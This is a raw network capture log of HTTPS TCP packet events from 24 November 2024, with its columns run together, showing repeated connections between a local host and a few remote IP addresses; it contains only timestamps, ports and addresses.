                                                                                                                                                                        Nov 24, 2024 05:11:24.185522079 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185545921 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185551882 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.185579062 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.185621977 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185652971 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185791016 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185795069 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.185801983 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.185808897 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.248358011 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.248384953 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.248440027 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.248557091 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.248794079 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.248806953 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.248837948 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.248842955 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.251641035 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.251703024 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.251795053 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.251940012 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:24.251970053 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.819005966 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.819092989 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.819147110 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.819339991 CET49711443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.819355965 CET44349711104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.984895945 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.984971046 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:24.985075951 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.985506058 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:24.985539913 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.848973036 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.849550962 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.849576950 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.850084066 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.850091934 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.883737087 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.884378910 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.884397030 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.884845972 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.884850979 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.965387106 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.965815067 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.965826988 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.966274977 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.966279030 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.968365908 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.968622923 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.968641043 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:25.968943119 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:25.968950987 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.032696962 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.033427000 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.033458948 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.033875942 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.033883095 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.247486115 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.247580051 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:26.248858929 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:26.248889923 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.249140978 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.250363111 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:26.250534058 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:26.250581980 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.250643015 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:26.282527924 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.282604933 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.284825087 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.284825087 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.284825087 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.285871029 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.285909891 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.286004066 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.286156893 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.286175013 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.291328907 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.338754892 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.338804007 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.338867903 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.346195936 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.346195936 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.346210003 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.346218109 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.349556923 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.349585056 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.349692106 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.349843979 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.349855900 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.409490108 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.409542084 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.409679890 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.409909010 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.409914970 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.409933090 CET49715443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.409936905 CET4434971513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.412286043 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.412364960 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.412456989 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.412600994 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.412632942 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.417032003 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.417083979 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.417125940 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.417226076 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.417248964 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.417263031 CET49714443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.417270899 CET4434971413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.418960094 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.418986082 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.419049025 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.419162989 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.419177055 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.476573944 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.476635933 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.476686001 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.476828098 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.476845980 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.476859093 CET49716443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.476866007 CET4434971613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.478817940 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.478884935 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.478972912 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.479089022 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.479123116 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:26.583290100 CET49712443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:26.583323002 CET4434971213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:27.120343924 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:27.120429993 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:27.120503902 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:27.120640993 CET49717443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:27.120685101 CET44349717104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:27.299443007 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:27.299483061 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:27.299561977 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:27.299909115 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:27.299923897 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.008887053 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.009644032 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.009689093 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.010212898 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.010245085 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.069099903 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.069890976 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.069909096 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.070349932 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.070354939 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.208439112 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.209070921 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.209098101 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.209608078 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.209613085 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.265989065 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.266385078 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.266408920 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.266807079 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.266812086 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.267810106 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.268088102 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.268130064 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.268436909 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.268450022 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.441823006 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.441997051 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.442094088 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.442167044 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.442167044 CET49718443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.442203999 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.442229986 CET4434971813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.449068069 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.449105024 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.449173927 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.449462891 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.449480057 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.503279924 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.503379107 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.503480911 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.503568888 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.503590107 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.503613949 CET49719443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.503619909 CET4434971913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.506032944 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.506073952 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.506154060 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.506280899 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.506300926 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.559449911 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.559551954 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:28.560976982 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:28.560986042 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.561224937 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.562627077 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:28.562762976 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:28.562793970 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.562856913 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:28.562866926 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.641746044 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.641890049 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.641974926 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.642146111 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.642205954 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.642257929 CET49722443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.642275095 CET4434972213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.645052910 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.645080090 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.645163059 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.645340919 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.645354033 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.710993052 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.711148977 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.711221933 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.711365938 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.711365938 CET49720443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.711390018 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.711410046 CET4434972013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.712435007 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.712497950 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.712549925 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.712723970 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.712723970 CET49721443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.712748051 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.712758064 CET4434972113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.715102911 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.715146065 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.715245962 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.715471029 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.715492010 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.716049910 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.716062069 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:28.716124058 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.716223955 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:28.716238022 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:29.464286089 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:29.464375019 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:29.464528084 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:29.464700937 CET49723443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:29.464714050 CET44349723104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:29.869246006 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:29.869298935 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:29.869648933 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:29.869961977 CET49729443192.168.2.7104.21.33.116
                                                                                                                                                                        Nov 24, 2024 05:11:29.869982004 CET44349729104.21.33.116192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.231657982 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.234148979 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.234179020 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.234636068 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.234642029 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.355123997 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.355820894 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.355868101 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.356297970 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.356313944 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.429670095 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.430110931 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.430136919 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.430634022 CET49726443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.430639029 CET4434972613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.494899035 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.495362997 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.495409012 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.495765924 CET49727443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.495779037 CET4434972713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.573517084 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.574095964 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.574120045 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.574525118 CET49728443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.574536085 CET4434972813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.633972883 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:30.634008884 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.634130955 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:30.636188984 CET49730443192.168.2.74.175.87.197
                                                                                                                                                                        Nov 24, 2024 05:11:30.636199951 CET443497304.175.87.197192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.675543070 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.675704002 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.675760984 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.675827026 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.675843954 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.675854921 CET49724443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.675859928 CET4434972413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.679133892 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.679156065 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.679222107 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.679416895 CET49731443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.679428101 CET4434973113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.809906960 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.809981108 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.810072899 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.810184002 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.810230970 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.810265064 CET49725443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.810280085 CET4434972513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.812973976 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.813020945 CET4434973213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:30.813072920 CET49732443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:30.813214064 CET49732443192.168.2.713.107.246.63
